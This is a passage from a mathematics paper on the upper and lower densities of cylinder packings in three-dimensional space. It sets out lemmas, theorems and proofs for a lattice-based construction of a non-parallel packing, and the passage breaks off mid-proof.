denoted \(C^{*}\), has the same radius as \(C\) and it's axis is the line that passes through the point where the axis of \(C\) intersects the \((x,y)\)-plane and is perpendicular to the \((x,y)\)-plane._ **Lemma 2.3**.: _Let \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) be a cylinder packing with the property that for every \(i\) the axis of \(C_{i}\) intersects the \((x,y)\)-plane in a point \(A_{i}\) and is perpendicular to the line \(OA_{i}\). Let \(\widetilde{\mathcal{C}}\) be the dual circle packing of \(\mathcal{C}\). Then \(\delta^{+}(\mathcal{C})=\delta^{+}(\widetilde{\mathcal{C}})\) and \(\delta^{-}(\mathcal{C})=\delta^{-}(\widetilde{\mathcal{C}})\)._ Proof.: If the axes of all the cylinders \(C_{i}\) are perpendicular to the \((x,y)\)-plane, the lemma follows from Fubini's theorem - For every plane of the form z=a, the intersection of the plane with a ball which centered at the origin is a circle, and the intersection of the circle with the cylinders is a lift of the intersection of \(\widetilde{\mathcal{C}}\) with the projection of the circle to the \((x,y)\)-plane, then we can use the density of \(\widetilde{\mathcal{C}}\) in all circles expect in 2 domes, which are negligible for big radius of the ball. In the general case, we claim that for every cylinder \(C_{i}\) and every \(r>0\), \[\operatorname{Vol}(C_{i}\cap B_{r}^{3}(0))=\operatorname{Vol}(C_{i}^{*}\cap B _{r}^{3}(0)),\] which clearly will complete the proof. To prove the claim, we note that the axis of the dual cylinder \(C_{i}^{*}\) is the image of the axis of \(C_{i}\) under a rotation-transformation \(T\) around \(OA_{i}\). Since \(T\) is an isometry, \(d(x,\ell)=d(T(x),T(\ell))\) for every line \(\ell\), in particular for \(\ell_{A_{i}}\). Denote \(\ell=\ell_{A_{i}}\) for simplicity. Therefore, if \(d(x,\ell)<r\), then \(d(T(x),T(\ell)<r\), and so if \(d(y,T(\ell))<r\) we have \[d(T^{-1}(y),T^{-1}(T(\ell)))\underset{T\text{ is }1-1}{=}d((T^{-1}(y),\ell)<r.\] Hence, \(C_{i}^{*}=T(C_{i})\), and since \(O\) lies on \(OA_{i}\), necessarily \(T(O)=O\). Moreover, since \(T\) is an isometry, \(\|(T(x))\|=\|x\|\) for all \(x\in\mathbb{R}^{3}\), so \(C_{i}^{*}\cap B_{r}^{3}(0)=T(C_{i}\cap B_{r}^{3}(0))\). We conclude that \(\operatorname{Vol}(C_{i}^{*}\cap B_{r}^{3}(0))=\operatorname{Vol}(T(C_{i} \cap B_{r}^{3}(0))\), which completes the proof in this case. Proof of theorem 2.2.: Let us calculate the lower density of the dual circle packing \(\widetilde{\mathcal{C}}\) in the plane which consists of the circles with radius \(1/2\) centered at the points in \(\bigcup_{j=r_{0}}^{\infty}(\mathcal{A}_{j})\). By lemma 2.3, \(\delta^{+}(\mathcal{C})=\delta^{+}(\widetilde{\mathcal{C}})\) and \(\delta^{-}(\mathcal{C})=\delta^{-}(\widetilde{\mathcal{C}})\). Since in every annulus of the form \(D_{r}=B_{r+1}^{2}(0)/B_{r}^{2}(0)\) for \(2^{n}<r\leq 2^{n+1}-1\) there is the same number of centers of circles of the circle packing and \(vol(D_{r})\) is monotonically increasing in \(r\), if the limit \[\lim_{n\to\infty}\frac{\operatorname{Area}(B_{2^{n}}^{2}(0)\cap\widetilde{ \mathcal{C}})}{\operatorname{Area}(B_{2^{n}}^{2}(0))}\] exists, then it is equal to the \(\liminf\). Since for \(2^{n}<k\leq 2^{n+1}\) the density of centers (number of centers of circles of the circle packing divided by the area) in annulus of the form \(D_{k}=B_{k}^{2}(0)/B_{2^{n}}^{2}(0)\) is decreasing as a function of k, it's easy to show that the density of centers in \(B_{k}^{2}(0)\) is at least the minimum of the densities in \(B_{2^{n}}^{2}(0)\) and \(B_{2^{n+1}}^{2}(0)\), so we can't get a lower partial limit. Let \(\mathcal{U}_{n}\) denote the union of the circles in \(\widetilde{\mathcal{C}}\) with center of norm \(r\) such that \(2^{n}\leq r<2^{n+1}\). Then since \[\lim_{n\to\infty}\frac{\operatorname{Area}(\mathcal{U}_{n})}{ \operatorname{Area}(B_{2^{n+1}}^{2}(0))-\operatorname{Area}(B_{2^{n}}^{2}(0))}\] \[=\lim_{n\to\infty}\frac{\frac{\pi}{4}\cdot 2^{n}\cdot\frac{2}{1+ \varepsilon}\cdot 2^{n}}{3\pi\cdot 2^{2n}}\] \[=\frac{\pi}{6(1+\varepsilon)},\] Stolz's theorem implies that: 1. \[\lim_{n\to\infty}\frac{\operatorname{Area}(B_{2^{n}}^{2}(0)\cap\widetilde{ \mathcal{C}})}{\operatorname{Area}(B_{2^{n}}^{2}(0))}=\frac{\pi}{6(1+ \varepsilon)}.\] It follows that \(\delta^{-}(\mathcal{C})=\frac{\pi}{6(1+\varepsilon)}{\to}\frac{\pi}{6}\) as \(\varepsilon\to 0\), which completes the proof. **Theorem 2.4**.: _The upper density of the previous construction is \(\delta^{+}(C)=\frac{3\pi}{16(1+\varepsilon)}\)._ Proof.: let \(c\), \(0\leq c\leq 1\), be an arbitrary constant and consider the subsequence \(n_{k}=2^{k}(1+c)\). Then, using (i) we get that \[\lim_{n\to\infty}\frac{\operatorname{Area}(B_{n_{k}}^{2}(0)\cap \widetilde{\mathcal{C}})}{\operatorname{Area}(B_{n_{k}}^{2}(0))}\] \[=\lim_{n\to\infty}\frac{\operatorname{Area}(B_{2^{k}}^{2}(0) \cap\widetilde{\mathcal{C}})+\operatorname{Area}(B_{n_{k}}^{2}(0))\cap \widetilde{\mathcal{C}}/B_{2^{k}}^{2}(0))}{\operatorname{Area}(B_{n_{k}}^{2}( 0))}\] \[=\frac{\frac{\pi}{6(1+\varepsilon)}\cdot\operatorname{Area}(B_{2^ {k}}^{2}(0))(1+o(1))+2^{k}\cdot c\cdot 2^{k}\cdot\frac{\pi}{4}\cdot\frac{2\pi}{1+ \varepsilon}}{\pi(2^{k}(1+c))^{2}}\] \[=\frac{\pi\cdot(1+3c)}{6(1+\varepsilon)(1+c)^{2}}.\] **Lemma 2.5**.: _Let \(\{a_{n}\}_{n=1}^{\infty}\) be a sequence, and let \(A\) be a set of convergent subsequences of \(\{a_{n}\}_{n=1}^{\infty}\) which cover the sequence. Assume that for every \(\varepsilon>0\) there exists \(M>0\) such that for every \(n>M\) and every subsequence in \(A\) which includes \(a_{n}\), \(|a_{n}-l|<\varepsilon\) where \(l\) is the limit of the subsequence. Let \(B\) be the set of partial limits of subsequences in \(A\), then \(B\) has a maximum and_ \[\limsup_{n\to\infty}a_{n}=\max B\] Proof.: the proof is easy and it's an exercise to the reader. Since for every \(\varepsilon>0\) there exists a \(k_{0}\in\mathbb{N}\), uniform in \(c\), such that \[\left|\frac{\operatorname{Area}(B_{n_{k}}^{2}(0)\cap\widetilde{\mathcal{C}}) }{\operatorname{Area}(B_{n_{k}}^{2}(0))}-\frac{\pi\cdot(1+3c)}{6(1+\varepsilon )(1+c)^{2}}\right|<\varepsilon,\] for every \(k\geq k_{0}\), we can use lemma 2.5 and conclude that \[\delta^{+}(C) =\limsup_{r\to\infty}\frac{\operatorname{Vol}(B_{r}^{3}(0)\cap \widetilde{\mathcal{C}})}{\operatorname{Vol}(B_{r}^{3}(0))}\] \[=\max_{0\leq c\leq 1}\frac{\pi\cdot(1+3c)}{6(1+\varepsilon)(1+c )^{2}}\] \[=\frac{3\pi}{16(1+\varepsilon)}\] (In order to calculate the maximum we looked at the derivative and set it equal to \(0\)). **Corollary 2.6**.: _Let \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) be a cylinder packing with the property that for every \(i\) the axis of \(C_{i}\) intersects the \((x,y)\)-plane in a point \(A_{i}\) such that the axis is perpendicular to the line \(OA_{i}\), and the property that the set of the intersection points of the axes with the \((x,y)-plane\) satisfy:_ 1. _They have integer norm._ 2. _The distance between any two of the points is at least 1._ _Then, \(\delta^{+}(\mathcal{C})\leq\frac{3\pi}{16}\)._ Proof.: The proof is very similar to the proof of theorem 2.4, and it's an exercise to the reader. ## 3 Existence of a non-parallel cylinder packing with upper density \(\frac{\pi}{\sqrt{12}}\) Consider the following two sequences, defined recursively: 1. \(a_{1}=1\), \(a_{k+1}=100a_{k}\). 2. \(T_{1}=1\), \(T_{k+1}=2^{10a_{k+1}}\cdot T_{k}\). For every \(k\in\mathbb{N}\), define \(\Omega_{k}=\{x\in\mathbb{R}^{2}|\,2^{a_{k}}<\|x\|\leq 2^{2a_{k}}\}\), and for every \(x=(x_{1},y_{1},0)\in\Omega_{k}\), consider the straight line \(\ell_{x}=\{(x_{1},y_{1},0)+t(y_{1},-x_{1},T_{k}):t\in\mathbb{R}\}\). **Lemma 3.1**.: _For any pair of distinct points \(p_{1},p_{2}\in\bigcup_{k=1}^{\infty}\Omega_{k}\), the lines \(\ell_{1}=\ell_{p_{1}}\) and \(\ell_{2}=\ell_{p_{2}}\) are not parallel._ Proof.: Assume, by contradiction, that \(\ell_{1}\) and \(\ell_{2}\) are parallel. Denote \(p_{1}=(x_{1},y_{1})\) and \(p_{2}=(x_{2},y_{2})\) and assume that \(p_{1}\in\Omega_{k_{1}}\) and \(p_{2}\in\Omega_{k_{2}}\), \(k_{2}\geq k_{1}\). Then, there exists \(c\in\mathbb{R}\) such that \((y_{2},-x_{2},T_{k_{2}})=c(y_{1},-x_{1},T_{k_{1}})\). If \(k_{1}=k_{2}\), then \(c=1\) and so \((x_{1},y_{1})=(x_{2},y_{2})\), a contradiction. Now suppose that \(k_{1}\neq k_{2}\). Then \[\frac{T_{k_{2}}}{T_{k_{1}}}=c=\frac{\|(x_{2},y_{2})\|}{\|(x_{1},y_{1})\|}.\] For every \(k\in\mathbb{N}\), and points \(p_{1}\in\Omega_{k}\), \(p_{2}\in\Omega_{k+1}\), \(\frac{T_{k+1}}{T_{k}}=2^{1000a_{k}}\) and \[\frac{\|(x_{2},y_{2})\|}{\|(x_{1},y_{1})\|}\leq\|(x_{2},y_{2})\|\leq 2^{200a_{k} }<2^{1000a_{k}}=\frac{T_{k+1}}{T_{k}}.\] Hence, by induction, for any two points \(x_{1}\in\Omega_{k_{1}}\) and \(x_{2}\in\Omega_{k_{2}}\) (\(k_{2}>k_{1}\)) we have \[\frac{\|(x_{2},y_{2})\|}{\|(x_{1},y_{1})\|}<\frac{T_{k_{2}}}{T_{k_{1}}},\] which contradicts the equality in \((*)\). Therefore, \(\ell_{1}\) and \(\ell_{2}\) are not parallel. **Theorem 3.2**.: _There exists \(k_{0}\in\mathbb{N}\) such that for every \(\varepsilon>0\) there exists \(m_{0}\in\mathbb{N}\) such that for any pair \(k_{2}>m_{0}\), \(k_{1}>k_{0}\), \(k_{2}>k_{1}\) and any pair of points \(A_{1}\in\Omega_{k_{1}}\) and \(A_{2}\in\Omega_{k_{2}}\) for which (1) \(c=\cos\theta\) where \(\theta\) is angle between the line that passes through the points O and \(A_{1}\) and the line that passes through O and \(A_{2}\) satisfies \(|c|\geq\frac{1}{d_{2}^{0.975}}\). Then_ \[\mathrm{dist}(\ell_{1},\ell_{2})\geq(1-\varepsilon)d_{1}\] (_in particular, \(\mathrm{dist}(\ell_{1},\ell_{2})\geq(1-\varepsilon)\)), where \(d_{1}=\|A_{1}\|\), \(d_{2}=\|A_{2}\|\), \(\ell_{1}=\ell_{A_{1}}\), \(\ell_{2}=\ell_{A_{2}}\)._ Proof of theorem 3.2.: Denote \(T_{1}^{\prime}=T_{k_{1}}\), \(T_{2}^{\prime}=T_{k_{2}}\) and let \(v_{1},v_{2}\) be the direction vectors of \(\ell_{1},\ell_{2}\), respectively. We have \[\mathrm{dist}(\ell_{1},\ell_{2})=\frac{\left|\stackrel{{ \longrightarrow}}{{A_{1}}}\stackrel{{\longrightarrow}}{{A_{2}}} \cdot(v_{1}\times v_{2})\right|}{\|v_{1}\times v_{2}\|}\] where \(\cdot\) denotes the inner product.. We calculate: \[\left|\stackrel{{\longrightarrow}}{{A_{1}}} \stackrel{{\longrightarrow}}{{A_{2}}}\cdot(v_{1}\times v_{2}) \right|=\left|\left[\begin{matrix}x_{2}-x_{1}&y_{2}-y_{1}&0\\ y_{1}&-x_{1}&T_{1}^{\prime}\\ y_{2}&-x_{2}&T_{2}^{\prime}\end{matrix}\right]\right|\] \[=\left.-T_{1}^{\prime}\left|\left[\begin{matrix}x_{2}-x_{1}&y_{2} -y_{1}\\ y_{2}&-x_{2}\end{matrix}\right]\right|+T_{2}^{\prime}\left|\left[\begin{matrix} x_{2}-x_{1}&y_{2}-y_{1}\\ y_{1}&-x_{1}\end{matrix}\right]\right|\] \[=T_{1}^{\prime}\big{(}x_{2}^{2}+y_{2}^{2}-(x_{1}x_{2}+y_{1}y_{2}) \big{)}+T_{2}^{\prime}\big{(}d_{1}^{2}-(x_{1}x_{2}+y_{1}y_{2})\big{)}.\] Note that \(x_{1}x_{2}+y_{1}y_{2}=cd_{1}d_{2}\). Hence, by algebraic manipulation, \[\left|\stackrel{{\longrightarrow}}{{A_{1}}}\stackrel{{ \longrightarrow}}{{A_{2}}}\cdot(v_{1}\times v_{2})\right|=T_{1}^{ \prime}\big{(}d_{2}^{2}-cd_{1}d_{2}\big{)}+T_{2}^{\prime}(d_{1}^{2}-cd_{1}d_{ 2}\big{)}.\] Next, \[\|v_{1} \times v_{2}\|^{2}=\|v_{1}\|^{2}\|v_{2}\|^{2}-(v_{1}\cdot v_{2})^{ 2}=(d_{1}^{2}+{T_{1}^{\prime}}^{2})(d_{2}^{2}+{T_{2}^{\prime}}^{2})-(x_{1}x_{ 2}+y_{1}y_{2}+T_{1}^{\prime}T_{2}^{\prime})^{2}\] \[=(d_{1}^{2}+{T_{1}^{\prime}}^{2})(d_{2}^{2}+{T_{2}^{\prime}}^{2})- (cd_{1}d_{2}+T_{1}^{\prime}T_{2}^{\prime})^{2}\] \[=(1-c^{2})d_{2}^{2}(d_{1}^{2}+{T_{1}^{\prime}}^{2})+(d_{1}T_{2}^{ \prime}-cT_{1}^{\prime}d_{2})^{2}.\] Therefore, \[\text{dist}^{2}(\ell_{1},\ell_{2})=\frac{(d_{1}^{2}T_{2}^{\prime}+d_{2}^{2}T_{1}^{ \prime}-(T_{1}^{\prime}+T_{2}^{\prime})d_{1}d_{2}c)^{2}}{(1-c^{2})d_{2}^{2}(d_{1 }^{2}+{T_{1}^{\prime}}^{2})+(d_{1}T_{2}^{\prime}-cT_{1}^{\prime}d_{2})^{2}},\] so the inequality \[\text{dist}^{2}(\ell_{1},\ell_{2})\geq(1-\varepsilon)d_{1}^{2}\] which leads the desired result, is equivalent to \[\big{(}d_{1}^{2}T_{2}^{\prime}+d_{2}^{2}T_{1}^{\prime}-(T_{1}+T_{2})d_{1}d_{2 }c\big{)}^{2}\geq(1-\varepsilon)d_{1}^{2}(1-c^{2})d_{2}^{2}(d_{1}^{2}+{T_{1}^ {\prime}}^{2})+(d_{1}T_{2}^{\prime}-cT_{1}^{\prime}d_{2})^{2}. \tag{2}\] Denoting \(d_{2}=d_{1}+h\), the left-hand side of (2) takes the form \[\big{(}d_{1}^{2}T_{2}^{\prime}+d_{2}^{2}T_{1}^{\prime}-(T_{1}^{ \prime}+T_{2}^{\prime})d_{1}d_{2}c\big{)}^{2}\] \[=\big{(}d_{1}^{2}T_{2}^{\prime}+(d_{1}^{2}+2hd_{1}+h^{2})T_{1}^{ \prime}-(T_{1}^{\prime}+T_{2}^{\prime})d_{1}d_{2}c\big{)}^{2}\] \[=\big{(}T_{1}^{\prime}((1-c)d_{1}^{2}+(2-c)hd_{1}+h^{2})+T_{2}^{ \prime}(d_{1}^{2}(1-c)-hd_{1}c))\big{)}^{2}.\] We want to verify that \[|d_{1}^{2}(1-c)-hd_{1}c|\geq d_{1}^{2}.\] it suffices to show that \(|hd_{1}c|\geq|3d_{1}^{2}|\), which is equivalent to \[|c|\geq\frac{3d_{1}}{h}.\] For \(d_{1}\) large enough (since \(h>d_{1}^{50}\)) its enough that \(|c|\notin(0,\frac{1}{(d_{1}+h)^{0.975}}\)), as in our assumptions. Denote \[I=\big{|}T_{1}^{\prime}\big{(}(1-c)d_{1}^{2}+(2-c)hd_{1}+h^{2}\big{)}\big{|}.\] If \(I<T_{2}d_{1}^{2}\), then \[\big{(}T_{1}^{\prime}((1-c)d_{1}^{2}+(2-c)hd_{1}+h^{2})+T_{2}^{ \prime}(d_{1}^{2}(1-c)-hd_{1}c))\big{)}^{2}\geq(T_{2}^{\prime}d_{1}^{2}-I)^{2}.\] \[I\leq 2hd_{1}T_{1}^{\prime}+h^{2}T_{1}^{\prime}+T_{1}^{\prime}d_{ 1}^{2}\leq d_{2}^{2}T_{1}^{\prime}+d_{2}^{2}T_{1}^{\prime}+2d_{2}^{2}T_{1}^{\prime}\] \[=4d_{2}^{2}T_{1}^{\prime}\leq 4\cdot 2^{4a_{k_{2}}}T_{1}^{\prime}=2 ^{10a_{k_{2}}}T_{1}^{\prime}\frac{4}{2^{6a_{k_{2}}}}\] \[\frac{T_{2}^{\prime}}{T_{1}^{\prime}}\geq\frac{T_{a_{k_{2}}}}{T_{a_{k_{2}-1}}}= 2^{10a_{k_{2}}}\Rightarrow 2^{10a_{k_{2}}}T_{1}\leq T_{2}^{\prime}\] \[\Rightarrow I\leq T_{2}^{\prime}\cdot o(1)\Rightarrow I\leq T_{2}^{\prime}d_{1}^{2} \cdot o(1)\] when the o(1) term is as a function of \(k_{2}\), as \(k_{2}\) tend to \(\infty\). Then (for \(k_{2}\) large enough): \[\left(T_{1}^{\prime}((1-c)d_{1}^{2}+(2-c)hd_{1}+h^{2})+T_{2}^{\prime}(d_{1}^{2} (1-c)-hd_{1}c))\right)^{2}\geq(T_{2}d_{1}^{2})^{2}(1+o(1))\] and for \(k_{2}\) large enough \[\geq(1-\frac{\varepsilon}{2})(T_{2}^{\prime}d_{1}^{2})^{2}.\] and since \(d_{2}T_{1}^{\prime}=o(d_{1}T_{2}^{\prime})\), on the right side of (2): \[(1-\varepsilon)d_{1}^{2}((1-c^{2})d_{2}^{2}(d_{1}^{2}+{T_{1}^{ \prime}}^{2})+(d_{1}T_{2}^{\prime}-cT_{1}^{\prime}d_{2})^{2})\leq(1- \varepsilon)(d_{1}^{2}(T_{2}^{\prime}d_{1})^{2}\cdot o(1)+(d_{1}T_{2}^{\prime })^{2}\cdot(1+o(1)))\leq(1-0.75\varepsilon)(T_{2}^{\prime}d_{1}^{2})^{2}(1+o( 1))\] when the o(1) term is as a function of \(k_{2}\), as \(k_{2}\) tend to \(\infty\). And again for \(k_{2}\) large enough the inequality holds, then \[\operatorname{dist}(\ell_{1},\ell_{2})^{2}\geq(1-\varepsilon)d_{1}^{2}\] \[\Rightarrow\operatorname{dist}(\ell_{1},\ell_{2})\geq\sqrt{1-\varepsilon}d_{1 }\geq(1-\varepsilon)d_{1}\] **Definition 3.1**.: _If \(\mathcal{L}\) is a lattice in \(\mathbf{R}^{2}\), define_ \[\operatorname{density}(\mathcal{L})=\lim_{r\to\infty}\frac{|B_{r}^{2}(0)\cap \mathcal{L}|}{\pi\cdot r^{2}}\] (_for lattices the limit always exists_)_._ **Theorem 3.3**.: _Let \(\mathscr{L}\) be a lattice in \(\mathbb{R}^{2}\) with the property that \(d(x_{1},x_{2})\geq 1\) for any two points \(x_{1},x_{2}\in\mathscr{L}\). Then, for every \(\varepsilon>0\) there exists a non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) such that:_ 1. _For any cylinder in_ \(\mathcal{C}\)_, the intersection of its axis with the_ \((x,y)\)_-plane lies in_ \(\mathscr{L}\)_._ 2. _The upper density of_ \(\mathcal{C}\) _is at least_ \(\operatorname{density}(\mathscr{L})\cdot\frac{\pi}{4}\cdot(1-\varepsilon)\)_._ The proof requires the following Lemma that show an intuitive idea- for every lattice \(\mathscr{L}\) and partition of circle of radius \(r\) into cut sectors with same angle and area tends to \(\infty\), the distribution of the sector of the points on the lattice which is in the circle, is converging to uniform(i.e, every sector has almost the same number of points on the lattice which is in the circle) **Lemma 3.4**.: _Let \(\mathscr{L}\) be a lattice in \(\mathbb{R}^{2}\) and S is a convex bounded subset of \(R^{2}\), such that the boundary of S is in the class Lip(n,M,L) (a definition of Lip(n,M,L) can be found in [7], Definition 2.2). Then \(||\mathscr{L}\cap S|-\mathrm{density}(\mathscr{L})\cdot area(S)|\leq C(n,L, \mathscr{L})\cdot M\) where \(C(n,L,\mathscr{L})\) is a constant that depend only on the constants \(n,L\) and the lattice \(\mathscr{L}\)._ Proof.: This follows directly from [7], Theorem 2.4 **Lemma 3.5**.: _Let \(\mathscr{L}\) be a lattice in \(\mathbb{R}^{\mathbb{z}}\) that is spanned over \(\mathbb{Z}\) by two linearly independent vectors. Let \(r>0\) and let \(\theta_{1}\) and \(\theta_{2}\) be numbers such that \(0\leq\theta_{1}<\theta_{2}\leq 2\pi\) and \(\theta_{2}-\theta_{1}\geq\frac{1}{2\sqrt{r}}\). Then in \(\mathscr{L}\cap B_{r}^{2}(0)\) there exist_ \[\mathrm{density}(\mathscr{L})\cdot\pi\cdot r^{2}\cdot\frac{\theta_{2}-\theta _{1}}{2\pi}\cdot(1+o(1))\] _points such that the angle \(\alpha(x)\) between the line that passes through such a point and the origin and the positive \(x\)-axis lies in \([\theta_{1},\theta_{2}]\). The term \(o(1)\) is bounded by a factor, g(r) such that g(r)=o(1) when r tends to infinity, and g(r) depends only on \(r\) and \(\mathscr{L}\) and not on the specific choice of \(\theta_{1},\theta_{2}\)._ Proof.: It's easy to check that every section of circle with radius r (WLOG \(r\in\mathcal{N}\)) is in the class Lip(2,10r, 1). Then, by the previous lemma, in every section C with angle \(\alpha\) of circle with radius r, there are \[\mathrm{density}(\mathscr{L})\cdot\pi\cdot r^{2}\cdot\alpha+q\] points in \(\mathscr{L}\cap C\), where \(|q|\) bounded by \(C(\mathscr{L})\cdot 10r\). which finishes the proof. **Theorem 3.6**.: _For every \(\varepsilon>0\) there exist an \(M>0\) such that the following holds: for any \(k_{1},k_{2}>M\) and any two points \(x_{1}\in\Omega_{k_{1}}\) and \(x_{2}\in\Omega_{k_{2}}\) such that \(k_{1}=k_{2}\) and \(\|x_{1}-x_{2}\|\geq 1\) or the pair \(x_{1},x_{2}\) satisfies condition (1) of theorem 3.2,_ \[\mathrm{dist}(\ell_{x_{1}},\ell_{x_{2}})\geq 1-\varepsilon.\] **Lemma 3.7**.: (Ismailescu and Laskawiec, [6]). _Let \(r,R>0\), \(A_{1}=(x_{1},y_{1},0)\), \(A_{2}=(x_{2},y_{2},0)\). Assume \(\|A_{1}A_{2}\|\geq 2r\), \(\|A_{1}\|\leq R\) and \(\|A_{2}\|\leq R\). Let \(\ell_{i}\) denote the straight line that passes through \(A_{i}\) and has the direction vector \(v_{i}=(y_{i},-x_{i},T)\) where \(8r^{2}T\geq R^{4}\), \(i=1,2\). Then_ \[\mathrm{dist}(\ell_{1},\ell_{2})\geq 2r\Big{(}1-\frac{1}{T}\Big{)}.\] A proof of this lemma can be found in [6], Lemma 2.1. Proof of theorem 3.6.: By theorem 3.2, there exist \(k_{0}\) such that for every \(k_{1},k_{2}>k_{0}\), \(k_{1}\neq k_{2}\), and every \(x_{1}\in\Omega_{k_{1}}\), \(x_{2}\in\Omega_{k_{2}}\) which satisfies (1), the assertion is true. Therefore, we need to find \(M^{\prime}=M^{\prime}(\varepsilon)\) such that the assertion holds true for every \(k>M^{\prime}\) and \(x_{1}\neq x_{2}\in\Omega_{k}\). Now, for every \(k\in\mathbb{N}\) and every point \(x\in\Omega_{k}\), \(\|x\|\leq 2^{2a_{k}}\), and for every point \(y\in\Omega_{k}\), \(y\neq x\), with \(\|x-y\|\geq 1=2\cdot\frac{1}{2}\), choose \(r=\frac{1}{2}\) and \(R=2^{2a_{k}}\). Then \(8r^{2}T_{k}=2T_{k}\geq 2^{100a_{k}}\geq 2^{8a_{k}}=R^{4}\). Hence, by lemma 3.7, \(\operatorname{dist}(\ell_{1},\ell_{2})\geq 2\cdot\frac{1}{2}\cdot(1-\frac{1}{T_{k}})= 1-\frac{1}{T_{k}}\) and since \(T_{k}\to\infty\) as \(k\to\infty\), there exists \(M^{\prime}=M^{\prime}(\varepsilon)\), such that for every \(k>M^{\prime}\), \(1-\frac{1}{T_{k}}\geq 1-\varepsilon\). Then, this implies that \(\operatorname{dist}(\ell_{1},\ell_{2})\geq 1-\varepsilon\). Proof of theorem 3.3.: Construction: Let \(\varepsilon>0\), and let \(M=M(\varepsilon)\) be the constant whose existence is asserted in theorem 3.6. For every \(k\geq M\) define the set \(\widetilde{\Omega_{k}}\) recursively by 1. \(\widetilde{\Omega_{M}}=\Omega_{M}\cap\mathscr{L}\). 2. For every \(k>M\), \(\widetilde{\Omega_{k}}\) is the set of all points in \(\Omega_{k}\cap\mathscr{L}\) that satisfy (1) with all the points in \(\bigcup_{i=M}^{k-1}\widetilde{\Omega_{i}}\). By lemma 3.5 and the Taylor expansion of the cosine function around \(\frac{\pi}{2}\), for every \(x\in\bigcup_{i=M}^{k-1}\widetilde{\Omega_{i}}\) there exist at most \(b\cdot\frac{1}{2^{\cdot 0.975a_{k}}}\cdot(2^{2a_{k}})^{2}\) points in \(\Omega_{k}\cap\mathscr{L}\) such that the absolute value of the cosine of the angle between the line that passes through the point and the origin and the line that passes through \(x\) and the origin lies in the range \(I=[0,\frac{1}{2^{0.975a_{k}}})\) where b is a constant (clearly that all the others satisfy (1) with x). Since \(\bigcup_{i=M}^{k-1}\widetilde{\Omega_{i}}\subseteq B_{2^{2a_{k-1}}}(0)\), there exist M', such that for every \(k>M^{\prime}\) there exist at most \[|\bigcup_{i=M}^{k-1}\widetilde{\Omega_{i}}| \leq|B_{2^{2a_{k-1}}}(0)\cap\mathscr{L}|\] \[\leq(\operatorname{density}(\mathscr{L})+0.01)\cdot\pi\cdot(2^{2a _{k-1}})^{2}\leq\left(\frac{4}{\sqrt{12}}+0.01\right)\cdot\pi\cdot 2^{4a_{k-1}}\] \[\leq 10\cdot 2^{4a_{k-1}}\] points in \(\bigcup_{i=M}^{k-1}\widetilde{\Omega_{i}}\). (\(\frac{4}{\sqrt{12}}\) is the maximal density of a lattice in the plane which satisfy that the distance between every \(2\) points on the lattice is at least \(1\), see [1]). Then for every \(k>\max\left\{M,M^{\prime}\right\}\) there are at most \[b\cdot\frac{1}{2^{0.975a_{k}}}\cdot(2^{2a_{k}})^{2}\cdot 10\cdot 2^{4a_{k-1}}=10b \cdot 2^{3.065a_{k}}\] points in \(\Omega_{k}\cap\mathscr{L}\) which don't satisfy (1) with some point in \(\bigcup_{i=M}^{k-1}\widetilde{\Omega_{i}}\). We define \(\widetilde{\Omega_{k}}\) to be the set of all points in \(\Omega_{k}\cap\mathscr{L}\) without these points. Now for every point in \(\widetilde{\Omega_{k}}\) we will construct a cylinder with axis \((x,y,0)+t(y,-x,T_{k})\) and radius \(\frac{1}{2}\cdot\left(1-\varepsilon\right)\). By theorem 3.2, it is a cylinder packing, and by lemma 3.1 it is non-parallel cylinder packing. denote the cylinder packing by \(C\). Since \[\lim_{k\to\infty}\frac{10b\cdot 2^{3.065a_{k}}}{\text{Area}\big{(}B_{2^{2a_{k}} }^{2}(0)\big{)}}=0,\] the points we remove will not affect the density of the dual circle packing \(\widetilde{\mathcal{C}}\). Then, by lemma 2.3, it is readily concluded that \(\delta^{+}(\mathcal{C})\geq\frac{\pi}{4}\cdot\left(1-\varepsilon\right)^{2} \cdot density(\mathscr{L})\), which finishes the proof. **Theorem 3.8**.: _For every lattice \(\mathcal{L}\), there exist a non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) such that:_ 1. _For any cylinder in_ \(\mathcal{C}\)_, the intersection of its axis with the_ \((x,y)\)_-plane lies in_ \(\mathcal{L}\)_._ 2. _The upper density of_ \(\mathcal{C}\) _is at least_ \(\text{density}(\mathcal{L})\cdot\frac{\pi}{4}\)_._ Proof.: Let \(\varepsilon_{n}=\frac{1}{n}\), for every \(n\geq 10\). Let \(k_{0}\), \(t_{n}=M^{\prime}(\varepsilon_{n})\) be the constants whose existence is asserted in theorem 3.2 (WLOG, \(t_{n}\) is monotonic increasing and \(t_{10}\geq k_{0}\)). Let \(p_{n}\) be the constant whose existence is asserted in theorem 3.6. Define \(m_{n}=max(\{p_{n},t_{n}\})\). Now, for every \(k\geq m_{10}\) define the set \(\widetilde{\Omega_{k}}\) recursively by 1. \(\widetilde{\Omega_{m_{10}}}=\Omega_{m_{10}}\cap\mathscr{L}\). 2. For every \(k>m_{10}\), \(\widetilde{\Omega_{k}}\) is the set of all points in \(\Omega_{k}\cap\mathscr{L}\) that satisfy (1) with all the points in \(\bigcup_{i=m_{10}}^{k-1}\widetilde{\Omega_{i}}\). By the same calculation of theorem 3.3, the points we remove don't affect about the density of the set of the points on the \((x,y)\)-plane that we choose. For every \(k\geq m_{10}\), \((x_{1},y_{1},0)\in\widetilde{\Omega_{k}}\), we take the axis \(\ell_{x}=\{(x_{1},y_{1},0)+t(y_{1},-x_{1},T_{k}):t\in\mathbb{R}\}\). Now, for every \(n\geq 10\), and for every \(k_{2}\geq k_{1}\geq m_{10}\) such that \(k_{2}\geq m_{n}\), for every \(x_{1}\in\widetilde{\Omega_{k_{1}}}\), \(x_{2}\in\widetilde{\Omega_{k_{2}}}\) define \(\ell_{1}=\ell_{x1}\), \(\ell_{2}=\ell_{x2}\) 1. If \(k_{1}=k_{2}\), then \(\text{dist}(\ell_{1},\ell_{2})\geq 1-\varepsilon_{n}\) 2. If \(k_{2}\neq k_{1}\) (without loss of generality we can assume that \(k_{2}>k_{1}\)) and if \(x_{1},x_{2}\) satisfy (1), then \(\text{dist}(\ell_{1},\ell_{2})\geq(1-\varepsilon_{n})d_{1}\), when \(d_{1}=\|x_{1}\|\). Now, take \(m_{10},m_{11}\) which are suitable for \(\varepsilon_{10}\), \(\varepsilon_{11}\) respectively (without loss of 